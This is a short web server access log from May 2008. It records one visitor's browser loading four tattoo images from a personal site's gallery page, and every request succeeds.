87.11.67.125 - - [10/May/2008:02:50:17 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:17 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:17 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:17 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
